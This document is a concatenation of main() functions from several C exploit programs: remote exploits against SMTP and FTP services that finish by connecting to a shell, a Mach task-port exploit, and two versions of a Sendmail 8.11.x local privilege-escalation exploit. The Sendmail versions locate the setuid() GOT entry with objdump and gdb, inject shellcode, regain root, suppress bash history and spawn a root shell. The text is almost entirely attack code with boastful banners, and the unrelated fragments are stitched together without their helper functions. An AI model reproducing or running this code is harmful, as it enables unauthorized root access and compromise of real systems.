int main(int argc, char **argv) { int sock = 0, npad = 0; u_int retloc = 0, retaddr = 0; char *host = NULL; if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr)) bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]); printf("--{ Smack 1.oohaah\n\n"); sock = conn(host, SMTP_PORT); printf("--{ definitely, adv.:\n" "--{ 1. Having distinct limits\n" "--{ 2. Indisputable; certain\n" "--{ 3. Clearly defined; explicitly precise\n\n" ); sploit(sock, npad, retloc, retaddr); printf("--{ Attempting to redefine the meaning of 'definitely'\n\n"); shell(host, SHELL_PORT); return EXIT_SUCCESS; }
int main(int argc, char **argv) { int sock = 0; args argy; memset(&argy, 0, sizeof(argy)); argy.align = ALIGN; argy.port = FTP_PORT; argy.remote_file = REMOTE_FILE; parse_args(argc, argv, &argy); sock = conn(argy.host, argy.port, SOCK_DGRAM); sploit(&argy, sock); sleep(2); printf("triggering overwritten jumpslot\n\n"); trigger_retloc(sock); sleep(1); close(sock); shell(argy.host, SHELL_PORT); return EXIT_SUCCESS; }
int main(int argc, char **argv) { int sock = 0; args args; memset(&args, 0, sizeof(args)); parse_args(argc, argv, &args); sock = conn(args.host, args.port); login(args.user, args.pass, sock); sploit(&args, sock); close(sock); sleep(20); shell(args.host, SHELL_PORT); return 0; }
int main(int argc, char** argv) { setup_shared_port(); pid_t child_pid = fork(); if (child_pid == -1) { FAIL("forking"); } if (child_pid == 0) { mach_port_t shared_port_child = recover_shared_port_child(); do_child(shared_port_child); } else { mach_port_t shared_port_parent = recover_shared_port_parent(); mach_port_t child_task_port = do_parent(shared_port_parent); sploit(child_pid, child_task_port); } return 0; }
int main(int argc, char *argv[]) { char victim[256] = SM; char vict[256]; char gscr[256]; char path[256]; char d[256]; struct stat st; FILE *f; char buf[256]; int got; struct target t[1024]; uint off, ep, l; int i,j; int offset = -16384; int esp; int depth = 32; int brute = 0; /* rootshell (if argv[0] == NULL) */ if (!*argv) { /* open stdin and stdout */ dup2(2, 0); dup2(2, 1); setuid(0); /* regain root privs */ setgid(0); /* send signal to parent that exploit is done */ kill(getppid(), SIGUSR1); /* l-a-m-e ;) */ printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout); chdir("/"); system("/usr/bin/id"); setenv("BASH_HISTORY", "/dev/null", 1); execl("/bin/bash", "-bash", NULL); } printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by [email protected] [sd@ircnet], 2001 ]=-...\n" " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"); while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) { switch (i) { case 'd': if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1)) return use(argv[0]); break; case 'o': if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1)) return use(argv[0]); break; case 'v': if (!optarg) return use(argv[0]); strcpy(victim, optarg); break; case 't': if (!optarg) return use(argv[0]); strcpy(ourdir, optarg); break; case 'b': brute++; break; case 'h': default: return use(argv[0]); } } if (brute) printf("[*] Using brute force, this may take some time\n"); /* create full path to rootshell, cause sendmail will change it's cwd */ path[0] = 0; if (argv[0][0] != '/') { getcwd(path, 256); } /* construct shellcode */ sprintf(scode, "%s%s/%s", shellcode, path, argv[0]); /* get stack frame */ esp = get_esp(); close(0); signal(SIGUSR1, sigusr); /* remove old stuff */ giveup(-1); printf( "[*] Victim = %s\n" "[*] Depth = %d\n" "[*] Offset = %d\n" "[*] Temp = %s\n" "[*] ESP = 0x%08x\n", victim, depth, offset, ourdir, esp); stat(victim, &st); if ((st.st_mode & S_ISUID) == 0) { printf("[-] Bad: %s isn't suid ;(\n", victim); } if (access(victim, R_OK + X_OK + F_OK) < 0) { printf("[-] Bad: We haven't access to %s !\n", victim); } if (mkdir(ourdir, 0777) < 0) { perror("[-] Can't create our tempdir!\n"); giveup(1); } printf("[+] Created %s\n", ourdir); sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim); f = popen(buf, "r"); if (fscanf(f, "%x", &got) != 1) { pclose(f); printf("[-] Cannot get setuid() GOT\n"); giveup(1); } /* get GOT */ pclose(f); printf("[+] Step 1. setuid() got = 0x%08x\n", got); sprintf(vict, "%s/sm", ourdir); printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout); sprintf(buf, "/bin/cp -f %s %s", victim, vict); system(buf); if (access(vict, R_OK + X_OK + F_OK) < 0) { perror("Failed"); giveup(1); } printf("OK\n"); /* disassemble & find targets*/ printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout); if (!brute) { sprintf(buf, DLINE, DLINEA); } else { sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA); } f = popen(buf, "r"); i = 0; while (fgets(buf, 256, f)) { int k, dontadd = 0; if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n", &ep, d, d, d, d, d, d, &off, d) == 9) { /* same value ? */ for (k=0; k < i; k++) { if (t[k].off == off) dontadd++; } /* new value ? */ if (!dontadd) { /* add it to table */ t[i].off = off; t[i++].brk = ep; } } } pclose(f); printf("OK, found %d targets\n", i); /* gdb every target and look for theyr VECT */ printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout); sprintf(gscr, "%s/gdb", ourdir); off = 0; for (j=0; j < i; j++) { /* create gdb script */ f = fopen(gscr, "w+"); if (!f) { printf("Cannot create gdb script\n"); giveup(1); } fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off); fclose(f); sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict); f = popen(buf, "r"); if (!f) { printf("Failed to spawn gdb!\n"); giveup(1); } /* scan gdb's output */ while (1) { char buf[256]; char *p; t[j].vect = 0; p = fgets(buf, 256, f); if (!p) break; if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) { t[j].vect = l; off++; break; } } pclose(f); if (t[j].vect) { int pid; printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset); fflush(stdout); pid = fork(); if (pid == 0) { close(1); sploit(victim, got, t[j].vect, esp + offset); } /* wait until sendmail finishes (expoit failed) or until SIGUSR arrives */ wait(NULL); /* exploited ?? */ if (exploited) { wait(NULL); /* kill zombie */ printf("Thanx for choosing sd's products ;)\n"); exit(0); } } } printf("[-] All targets failed, probably not vulnerable ;(\n"); giveup(1); }
int main(int argc, char *argv[]) { char victim[256] = SM; char vict[256],gscr[256], path[256],d[256],buf[256]; struct stat st; FILE *f; struct target t[1024]; uint off,ep,l; int i,j,got,esp; int offset = -16384; int depth = 32; int brute = 0; if (!*argv) { dup2(2, 0); dup2(2, 1); setuid(0); setgid(0); kill(getppid(), SIGUSR1); printf( "------(*)>+== " "ENTERING ROOT SHELL" " ==+<(*)------" ); fflush(stdout); chdir("/"); setenv("PATH", "/bin:/usr/bin:/usr/local/bin:" "/sbin:/usr/sbin:/usr/local/sbin:" "/opt/bin:${PATH}",1); setenv("BASH_HISTORY", "/dev/null", 1); execl("/bin/bash", "-bash", NULL); } printf( " ------------------------------------------------\n" " Sendmail 8.11.x linux i386 exploit \n" " wroten by [email protected] [sd@ircnet], \n" " fixed by [email protected] \n" " ------------------------------------------------\n" " type \"%s -h\" to get help\n",argv[0] ); while ((i=getopt(argc,argv,"hd:o:v:t:b"))!=EOF){ switch (i) { case 'd': if ((!optarg)||(sscanf(optarg,"%d",&depth)!=1)) return use(argv[0]); break; case 'o': if ((!optarg)||(sscanf(optarg,"%d",&offset)!=1)) return use(argv[0]); break; case 'v': if (!optarg) return use(argv[0]); strcpy(victim,optarg); break; case 't': if (!optarg) return use(argv[0]); strcpy(ourdir, optarg); break; case 'b': brute++; break; case 'h': default: return use(argv[0]); } } if (brute) printf( "[*] brute force " "to 20-30mins\n"); path[0] = 0; if (argv[0][0] != '/') { getcwd(path, 256); } sprintf(scode, "%s%s/%s", shellcode, path, argv[0]); esp = get_esp(); close(0); signal(SIGUSR1, sigusr); giveup(-1); printf( " [Victim=%s][Depth=%d][Offset=%d]\n" " [Temp=%s][Offset=%d][ESP=0x%08x]\n", victim, depth, offset, ourdir, esp ); stat(victim, &st); if ((st.st_mode & S_ISUID) == 0) { printf("[!] Error: %s doesn't have SUID mode\n", victim); } if (access(victim, R_OK + X_OK + F_OK) < 0) { printf("[!] Error: %s must exist, have mode +rx\n", victim); } if (mkdir(ourdir, 0777) < 0) { perror("[!] Error: creating temporary directory\n"); giveup(1); } //printf("[*] creating temp directory - %s\n", // ourdir); sprintf(buf, "%s -R %s | %s setuid", OBJDUMP, victim, GREP); f = popen(buf, "r"); if (fscanf(f, "%x", &got) != 1) { pclose(f); printf("[!] Error: cannot get " "setuid() GOT\n"); giveup(1); } pclose(f); printf("[*] --> Step 1. setuid() " "[got=0x%08x]\n", got); sprintf(vict, "%s/sm", ourdir); printf("[*] --> Step 2. copy " "[%s->%s]\n", victim, vict); fflush(stdout); sprintf(buf, "%s -f %s %s", COPYCMD, victim, vict); system(buf); if (access(vict,R_OK+X_OK+F_OK)<0){ printf( "[!] Error: copy victim to out temp\n"); giveup(1); } printf( "[*] --> Step 3. disassm our " "[%s]\n", vict); fflush(stdout); if (!brute) { sprintf(buf,DLINE,DLINEA); } else { sprintf(buf,BRUTE_DLINE,BRUTE_DLINEA); } f = popen(buf, "r"); i = 0; while (fgets(buf,256,f)) { int k, dontadd=0; if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n", &ep,d,d,d,d,d,d,&off,d)==9){ for (k=0;k<i;k++){ if (t[k].off==off) dontadd++; } if (!dontadd) { t[i].off = off; t[i++].brk = ep; } } } pclose(f); sprintf(gscr, "%s/gdb", ourdir); off = 0; for (j=0; j < i; j++) { f = fopen(gscr, "w+"); if (!f) { printf("[!] Error: Cannot create gdb script\n"); giveup(1); } fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off); fclose(f); sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict); f = popen(buf, "r"); if (!f) { printf("[!] Error: Failed to spawn gdb!\n"); giveup(1); } while (1) { char buf[256]; char *p; t[j].vect = 0; p = fgets(buf, 256, f); if (!p) break; if (sscanf(p,"0x%x %s 0x%x",&ep,d,&l)==3){ t[j].vect = l; off++; break; } } pclose(f); if (t[j].vect) { int pid; printf(" ++[%d/%d](%d%%) " "GOT=0x%08x,VECT=0x%08x," "OFF=%d\n", j, i, j*100/i, got, t[j].vect, offset); fflush(stdout); pid = fork(); if (pid == 0) { close(1); sploit(victim,got,t[j].vect,esp+offset); } wait(NULL); if (exploited) { wait(NULL); printf(" [-*-] We rule! BYE! [-*-]\n"); exit(0); } } } printf( "[!] ERROR: all targets failed," "probably not buggie\n"); giveup(1); }